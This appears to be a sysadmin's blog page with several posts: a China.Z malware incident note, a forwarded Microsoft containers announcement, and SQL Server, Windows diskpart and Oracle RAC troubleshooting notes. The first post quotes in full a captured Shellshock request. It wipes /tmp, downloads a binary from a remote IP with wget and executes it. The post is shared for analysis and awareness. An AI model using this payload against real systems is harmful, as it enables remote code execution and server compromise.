China.z Malware info

My prod server got a security issue where below show the same case:

From :http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying the request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

also,you can follow the pages as workround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html

–EOF–

 

Something interesting is happening…

Something interesting is happening…

The world’s largest taxi company owns no vehicles;the world’s most popular media owner creates no content;the most valuable retailer has no inventory;the world’s largest accommodation provider owners no real estate.

the revolution is involving..

interesting is happening

FW:Microsoft Announces New Container Technologies for the Next Generation Cloud

source:http://blogs.technet.com/b/server-cloud/archive/2015/04/08/microsoft-announces-new-container-technologies-for-the-next-generation-cloud.aspx

Guest post by Mike Neil, General Manager for Windows Server, Microsoft

In today’s cloud-first world, businesses increasingly rely on applications to fuel innovation and productivity. As the cloud evolves, containers are emerging as an attractive way for developers to quickly and efficiently build and deploy these applications at the speed of business. Offering developers and IT professionals the ability to deploy applications from a workstation to a server in mere seconds, containers are taking application development to a whole new level.

As developers look to expand the benefits of containers to a broader set of applications, new requirements are emerging. For example, heightened levels of trust may be required for enterprise systems or in hosted environments. Furthermore, developers often deploy into mixed operational environments where they may not have control of the platform where the application is deployed. Virtualization has historically provided a valuable level of isolation that enables these scenarios but there is now opportunity to blend the efficiency and density of the container model with the right level of isolation.

Last October, Microsoft and Docker, Inc. jointly announced plans to bring containers to developers across the Docker and Windows ecosystems via Windows Server Containers, available in the next version of Windows Server. We will be unveiling the first live demonstration in a few weeks, starting at the BUILD conference. Today, we are taking containerization one step further by expanding the scenarios and workloads developers can address with containers:

• Hyper-V Containers, a new container deployment option with enhanced isolation powered by Hyper-V virtualization 
• Nano Server, a minimal footprint installation of Windows Server that is highly optimized for the cloud, and ideal for containers.

First-of-Their-Kind Hyper-V Containers

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

While Hyper-V containers offer an additional deployment option between Windows Server Containers and the Hyper-V virtual machine, you will be able to deploy them using the same development, programming and management tools you would use for Windows Server Containers. In addition, applications developed for Windows Server Containers can be deployed as a Hyper-V Container without modification, providing greater flexibility for operators who need to choose degrees of density, agility, and isolation in a multi-platform, multi-application environment.

Our Containers in the Docker Ecosystem

Docker plays an important part in enabling the container ecosystem across Linux, Windows Server and the forthcoming Hyper-V Containers. We have been working closely with the Docker community to leverage and extend container innovations in Windows Server and Microsoft Azure, including submitting the development of the Docker engine for Windows Server Containers as an open contribution to the Docker repository on GitHub. In addition, we’ve made it easier to deploy the latest Docker engine using Azure extensions to setup a Docker host on Azure Linux VMs and to deploy a Docker-managed VM directly from the Azure Marketplace. Finally, we’ve added integration for Swarm, Machine and Compose into Azure and Hyper-V.

“Microsoft has been a great partner and contributor to the Docker project since our joint announcement in October of 2014,” said Nick Stinemates, Head of Business Development and Technical Alliances. “They have made a number of enhancements to improve the developer experience for Docker on Azure, while making contributions to all aspects of the Docker platform including Docker orchestration tools and Docker Client on Windows. Microsoft has also demonstrated its leadership within the community by providing compelling new content like dockerized .NET for Linux. At the same time, they’ve been working to extend the benefits of Docker containers- application portability to any infrastructure and an accelerated development process–to its Windows developer community.”

Introducing Nano Server: The Nucleus of Modern Apps and Cloud

The operating system has evolved dramatically with the move to the cloud. Many customers today need their OS for the primary purpose of powering born-in-the-cloud applications. Leveraging our years of experience building and running hyper-scale datacenters, Microsoft is uniquely positioned to provide a purpose-built OS to power modern apps and containers.

The result is Nano Server, a minimal footprint installation option of Windows Server that is highly optimized for the cloud, including containers. Nano Server provides just the components you need – nothing else, meaning smaller server images, which reduces deployment times, decreases network bandwidth consumption, and improves uptime and security. This small footprint makes Nano Server an ideal complement for Windows Server Containers and Hyper-V Containers, as well as other cloud-optimized scenarios. A preview will be available in the coming weeks, and you can read more about the technology on the Windows Server blog.

Containers are bringing speed and scale to the next level in today’s cloud-first world. Microsoft is uniquely positioned to propel more organizations forward into the next era of containerization, by offering flexibility and choice through Windows Server containers, Linux containers, and Hyper-V containers both in the cloud and on-premises. Today’s announcements are just the beginning of what’s to come, as we continue to fuel both the growth of containers in the industry, and new levels of application innovation for all developers.

Stay tuned for more details on these new innovations, beginning at our BUILD conference in a few weeks.

FW:SQL Server and the “Lock pages in memory” Right in Windows Server

Here is a nice post talking about the “Lock pages in memory” for windows server,I just forward it from the source:
http://sqlserverperformance.wordpress.com/2011/02/14/sql-server-and-the-lock-pages-in-memory-right-in-windows-server/

It is pretty important to make sure you set the Max Server memory setting for SQL Server 2005/2008 to something besides the default setting (which allows SQL Server to use as much memory as it wants, subject to signals from the operating system that it is under memory pressure). This is especially important with larger, busier systems that may be under memory pressure.

This setting controls how much memory can be used by the SQL Server Buffer Pool. If you don’t set an upper limit for this value, other parts of SQL Server, and the operating system can be starved for memory, which can cause instability and performance problems. It is even more important to set this correctly if you have “Lock Pages in Memory” enabled for the SQL Server service account (which I always do for x64 systems with more than 4GB of memory)……………

Thanks to the author for the nice post

–EOF–

the “share option” in directory disappeared

I found that when the client pc was joined into the windows domian using windows 2003 Actice Directory the “share option” was gone as loggin by domain user.

it’s that when the domain users don’t have the privilege to create common windows directory share,you need to add the domain user to the POWER USER group.Even you login as domain administrator,the directory still lack the “sharing option”,you add it to the local administrators group,the sharing option will come out again.
Besides,the domain user did not have the privilege to share the directory,you need to enable the function in domain controller by policy tool(gpedit.ms)

Just mark it.

–EOF–

How to determine the version and edition of SQL Server and its components

How to determine the version and edition of SQL Server and its components? this page will indicate you about the version information from MS website:

https://support.microsoft.com/kb/321185/en-us

SQL Server 2012 version information

The following table lists the major releases of SQL Server 2012.
Release	Product Version
SQL Server 2012 Service Pack 1	11.00.3000.00
SQL Server 2012 RTM	        11.00.2100.60

SQL Server 2008 R2 version information

The following table lists the major releases of SQL Server 2008 R2.
Release	Product version
SQL Server 2008 R2 Service Pack 2	10.50.4000.0
SQL Server 2008 R2 Service Pack 1	10.50.2500.0
SQL Server 2008 R2 RTM	                10.50.1600.1

SQL Server 2008 version information

The following table lists the major releases of SQL Server 2008.
Release	Product version
SQL Server 2008 Service Pack 3	10.00.5500.00
SQL Server 2008 Service Pack 2	10.00.4000.00
SQL Server 2008 Service Pack 1	10.00.2531.00
SQL Server 2008 RTM	        10.00.1600.22

SQL Server 2005 version information

The following table lists the major releases of SQL Server 2005.
Release	Product version
SQL Server 2005 Service Pack 4	9.00.5000.00
SQL Server 2005 Service Pack 3	9.00.4035
SQL Server 2005 Service Pack 2	9.00.3042
SQL Server 2005 Service Pack 1	9.00.2047
SQL Server 2005 RTM	        9.00.1399

–EOF–

Shrink Trunsaction Logfile for SQL Server 2008R2

check the recovery mode of database

use master
SELECT NAME, recovery_model_desc FROM sys.databases;

change the recovery mode to simple

use master
alter database EDM_DEV set recovery simple;

locate the file name and the size of LOG file you want to shrink

use EDM_DEV
select name,size from sys.database_files;

the log is named “EDM_DEV_log”,shrink it to 1G

dbcc shrinkfile (N'EDM_DEV_log',1000)

check out the result of size of logfile,see if the size of logfile decreased

change the EDM database to full recovery mode

use matser
alter database EDM_DEV set recovery full;
SELECT NAME, recovery_model_desc FROM sys.databases;

cleanTrunsactionLogfile
–EOF–

windows server 2008 partition extend online

help the customer to extend the NTFS partition online to satisfy the disk consumtion,just mark it.

C:UsersAdministrator>diskpart

Microsoft DiskPart 版本 6.1.7601
Copyright (C) 1999-2008 Microsoft Corporation.
在计算机上: EDM-DEV-DB

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
 ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质

  卷     1         系统保留    NTFS   磁盘分区         100 MB  正常     系统
  卷     2     C               NTFS   磁盘分区          29 GB  正常     启动
  卷     3     D   新加卷      NTFS   磁盘分区         109 GB  正常
页面文件

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质

  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常    系统
  卷     2     C                NTFS   磁盘分区         29 GB  正常    启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常  页面文件

DISKPART> list

Microsoft DiskPart 版本 6.1.7601

DISK        - 显示磁盘列表。例如,LIST DISK。
PARTITION   - 显示所选磁盘上的分区列表。
              例如,LIST PARTITION。
VOLUME      - 显示卷列表。例如,LIST VOLUME。
VDISK       - 显示虚拟磁盘列表。

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质
  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常         系统
  卷     2     C               NTFS   磁盘分区          29 GB  正常         启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常         页面文件

DISKPART> list disk

  磁盘 ###  状态           大小     可用     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
  磁盘 0    联机              450 GB   310 GB

DISKPART> select disk 0

磁盘 0 现在是所选磁盘。

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质
  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常         系统
  卷     2     C                NTFS   磁盘分区          29 GB  正常         启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常         页面文件

DISKPART> list part

  分区 ###       类型              大小     偏移量
  -------------  ----------------  -------  -------
  分区      1    主要                 100 MB  1024 KB
  分区      2    主要                  29 GB   101 MB
  分区      3    主要                 109 GB    29 GB

DISKPART> select volume 3

卷 3 是所选卷。

DISKPART> extend 317440

为此命令指定的参数无效。
有关此命令类型的详细信息,请使用 HELP EXTEND 命令

DISKPART> extend size=317440

DiskPart 成功地扩展了卷。

DISKPART>

DISKPART> list part

  分区 ###       类型              大小     偏移量
  -------------  ----------------  -------  -------
  分区      1    主要                 100 MB  1024 KB
  分区      2    主要                  29 GB   101 MB
* 分区      3    主要                 419 GB    29 GB

–EOF–

sqlserver 2008r2 backup to the UNC share directory

I was trying to backup the sqlserver 2008 R2 to the share directory in the LAN,but lots of error trap me in.
I always got the error message as below:
backup database testdb to “\192.168.56.101backuptestdb.bak”

BackupDiskFile::CreateMedia: backup device ‘z:backupedm.bak’ can not be created。operation system error 3(can not find the path)

I think there must be some difference between the local disk and the UNC mapping disk.

the priviledge in the UNC share disk is ok,I can exclude it’s problem.
while it seem that it is because the account to start the SQL Server instance,that’s the root cause.
AS SQL Server services were startup by “NT AUTHORITYSYSTEM” which has no right to visit the remote resources in the LAN.If you use the domain user or any local os account who has the priviledge to visit remote resources,the problem will be overcome.
Finally,I change the startup account to administrator,this problem was solved.

Besides,it’s not recommended that you use the local administrator account to boot the SQL Server service,because when the OS admin change the password of administrator account,the SQL Server will can not be startup as the password was incorrect..

sqlserver2008R2_bakcup_to_UNC

–EOF–

upgrade oracle 11.2.0.3 RAC to 11.2.0.4

1.enviroment information

two nodes RAC on ASM based on oracle enterprise linux 6

crs version:11.2.0.3
rdbms version:11.2.0.3

2.precheck works
run the script “runcluvfy.sh” to verify if the two nodes is ready for upgrade
you can find the script runcluvfy.sh in the grid software package

3.prepare the directory
I will use the out-of-space upgrade,so I need to prepare the directory in advance.
out-of-space upgrade is recommended by oracle,prepare the seperated directory for the new GI home and RDBMS home Continue reading “upgrade oracle 11.2.0.3 RAC to 11.2.0.4”

srvctl: line xxx: /bin/java: No such file or directory

it’s quit strange,after opatching,the srvctl went wrong:

[oracle@node1 bin]$ srvctl
/opt/app/oracle/product/10.2.0/db_1/bin/srvctl: line 188: /bin/java: No such file or directory

it’s different from the situation of bug 3937317.

after comparing the content of srvctl,I find some missing value such as:

//there should be values in “JREDIR” and “JLIBDIR”

------------------------------------------------
CHOME=/local/oracle/app/OraHome_1/crs
OHOME=/local/oracle/app/OraHome_1/db_1
if [ "X$CHOME" != "X$OHOME" ]
then
    case $ORACLE_HOME in
        "") echo "****ORACLE_HOME environment variable not set!"
            echo "    ORACLE_HOME should be set to the main"
            echo "    directory that contains Oracle products."
            echo "    Set and export ORACLE_HOME, then re-run."
            exit 1;;
    esac
else
    ORACLE_HOME=/local/oracle/app/OraHome_1/crs
    export ORACLE_HOME
fi

# External Directory Variables set by the Installer
JREDIR=/local/oracle/app/OraHome_1/db_1/jdk/jre
JLIBDIR=/local/oracle/app/OraHome_1/db_1/jlib

# jar files
-------------------------------------------------

while there are no values in the srvctl where the issue happened,there should be

# External Directory Variables set by the Installer
JREDIR=
JLIBDIR=

//adding the values.attention,it’s different in $ORACLE_HOME/bin/srvctl and $ORACLE_CRS_HOME/bin/srvctl
//there were diffenrent,take that!

FOR:$ORACLE_HOME/bin/srvctl

# External Directory Variables set by the Installer
JREDIR=/opt/app/oracle/product/10.2.0/db_1/jdk/jre
JLIBDIR=/opt/app/oracle/product/10.2.0/db_1/jlib

FOR:$ORACLE_CRS_HOME/bin/srvctl

# External Directory Variables set by the Installer
JREDIR=/opt/app/oracle/product/10.2.0/crs/jdk/jre
JLIBDIR=/opt/app/oracle/product/10.2.0/crs/jlib

//problem solved
–EOF–